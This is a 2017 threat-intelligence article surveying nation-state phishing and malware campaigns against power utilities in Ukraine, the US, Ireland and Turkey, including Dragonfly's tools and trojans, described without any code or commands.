Last week, security analysts assessed that North Korea has been likely actively probing South Korean and American utility companies during the month of September through a concerted direct spearphishing campaign. While no direct breach of any utility occurred, phishing attempts are usually the first step of reconnaissance to lure the victim to download malicious codes or malware; this scenario involved distributing fake email invitations to a fundraiser that linked to the malware. This is not the first report of its kind, as a similar report only published days earlier, linked the Iranian group, APT33, to attacks across the United States, Saudi Arabia, and South Korea using email phishing and domain masquerading techniques for several aerospace and energy companies. This demonstrates a wide international distribution of threat actors actively engaged in cyberwarfare operations against western countries and their allies.

The first significant and well-known time a nationwide power grid has been knocked offline was during the Ukrainian-Russia conflict in December 2015. Russian cyber attackers (APT28/29, also referred to as Energetic Bear and Sandworm) successfully compromised information systems of three energy distribution companies in Ukraine and temporarily disrupted electricity supply to some 200,000 end consumers. A variety of utilities companies across Ukraine were affected. The attack lasted for almost a 6 hour period interrupting a total of up to 73 MWh of electricity, amounting to almost 95% of daily electricity consumption in Ukraine.

Tools used in the attack included an array of advanced persistent threats: Black Energy 3 and KillDisk and a framework that Dragos, Inc characterized as CRASHOVERRIDE.

Earlier this year, John MacWilliams, the first Chief Risk Officer for the Department of Energy (DOE), was quoted in an interview stating a consolidated US national power grid does not exist.

“Our electricity is supplied by a patchwork of not terribly innovative or imaginatively managed regional utilities. The federal government offers the only hope of a coordinated, intelligent response to threats to the system: there is no private-sector mechanism. To that end, the DOE had begun to gather the executives of the utility companies, to educate them about the threats they face.”

Reports of possible intrusions into the US power grid have been circulating over the last year. The first report surfaced in December 2016, out of Vermont, when Burlington Electric said in a statement that the company detected a malware code used in the Grizzly Steppe operation in a company laptop. It turned out the system was a laptop of a Burlington Electric employee, infected with the Neutrino malware (with no ties to Grizzly Steppe), and was not connected to Burlington’s network but merely logging into his personal Yahoo email account. The reporting was premature and blown out of context as the whole threat was non-existent and the Russians were at no time targeting the electric company in Vermont. The Washington Post ended up recanting its report and online articles.

Nevertheless, the first US electric utility network intrusion is believed to have taken place earlier this year in July 2017. Coincidently this cyber-attack was launched in Burlington, Kansas (not Vermont) against Wolf Creek Nuclear Operating Corp, a nuclear power station jointly owned by Kansas City Power & Light Co. (under Great Plains Energy), Westar Energy, and Kansas Electric Power Cooperative.

According to The NY Times, Wolf Creek officials said that while they could not comment on cyberattacks or security issues, no “operations systems” had been affected and that their corporate network and the internet were separate from the network that runs the plant. This suggests the potential impact was to business and administrative networks and the purpose of the attack was reconnaissance network collection for mapping the company’s digital footprint for future attacks, not available from the compromised subnet.

Malware was distributed via social engineering and email spear phishing. The attackers wrote highly targeted phishing email messages containing fake résumés for control engineering jobs and sent them to senior industrial control engineers who maintain broad access to critical industrial control systems.

It appears the same phishing email attempt was also successfully launched against energy utilities in other parts of the world. For example, in July, Irish security experts suggested that Russian government hackers tried to infiltrate the control systems of the Irish Republic’s power infrastructure by targeting senior engineers at the country’s Electricity Supply Board. These engineers were hit with a phishing email in June, which tried to trick them into downloading malicious software. There was no further report whether any control systems of power infrastructure were affected or how they determined the threat actors originated from Russia. Similarly, Ireland’s EIRGrid was also targeted in April 2017. Hackers, using IP addresses sourced in Ghana and Bulgaria, gained access to a Vodafone network used by Irish operator EirGrid in the UK, installed a virtual wiretap on the system, then compromised the routers used by EirGrid in Wales and Northern Ireland.

Concurrent with the attacks on Irish utilities, hackers targeted the Energy and Natural Resources within the Ministry of Turkey, minister Berat Albayrak confirmed, which aimed to infiltrate the country's power grid. No confirmations whether breach was successful. This was not the first time Turkey’s power grid had been digitally knocked offline. Unconfirmed, sporadic reporting in January 2017, accused the Americans of successfully launching cyberattacks against Turkey’s national power grid knocking off power for almost 3 days in various parts of Turkey during bitter cold weather in attempts to destabilize the country and undermine the government.

In early September, Symantec published a report on cyberattacks targeting the “Western Energy sector” affecting some 20 organizations across the US, 6 in Turkey, and one in Switzerland and linking them to the cyber espionage group, Dragonfly. Despite attempts to determine the names of the utilities affected, there is no detailed intelligence available at this time. Like previous Dragonfly campaigns and the attacks this summer against Wolf Creek and the Irish, the hackers are using malicious email (containing very specific content related to the energy sector) attachments, watering hole attacks, and trojanized software as an initial attack vector to gain access to a victim's network.

There was no evidence of the group using any zero day vulnerabilities of the target networks, but instead strategically used publically available administration tools like PowerShell, PsExec, and Bitsadmin.

The group uses a social engineering toolkit called Phishery, publicly available on GitHub, to perform email-based attacks that host template injection attack to steal victim's credentials.

The malware campaign involves infecting the compromised network with multiple remote access trojans masquerading as Flash updates called, Backdoor.Goodor, Backdoor.Dorshel and Trojan.Karagany.B, providing remote access to the victim's machine. Other Trojans Dragonfly used in this attack include: Trojan.Heriplor (Oldrea stage II) and Trojan.Listrix (Karagany stage II). The installed backdoors facilitate intelligence collection on the network including the use of a rather sophisticated screen captures naming nomenclature.

Screen Capture of the Phishery Install

It is unclear whether the attacks reported in 2016, in July, and September are separate unique incidents by unaffiliated threat actors or whether a global, concerted multinational, multi-staged cyber campaign against the utility sector is in-progress. For years, Iran and North Korea have been known to collaborate and share ballistic missile technologies and could easily co-develop cyber tools. Further, North Korea could simply be reusing code that is readily available and in circulation across the darknet from other operations conducted by elements of the Russian government and Eastern European cybercriminals.

The Symantec report in September intentionally removed any direct reference to energy utility names as the group now demonstrated the ability to sabotage or gain control of industrial control systems should it decide to do so. Many utilities rely on internet control systems, of which some are Bluetooth compatible. Across darknet forums and chatrooms, our intelligence analysts have witnessed an increased request for information on, or code related to, Blueborne-associated malware, in light of Armis Lab’s report covering 8 zero-day vulnerabilities in the Bluetooth short-range wireless communication technology protocol that impact more than 5.3 Billion devices—from Android, iOS, Windows and Linux to the Internet of things (IoT) devices. The issues range from information leak vulnerabilities to remote code execution.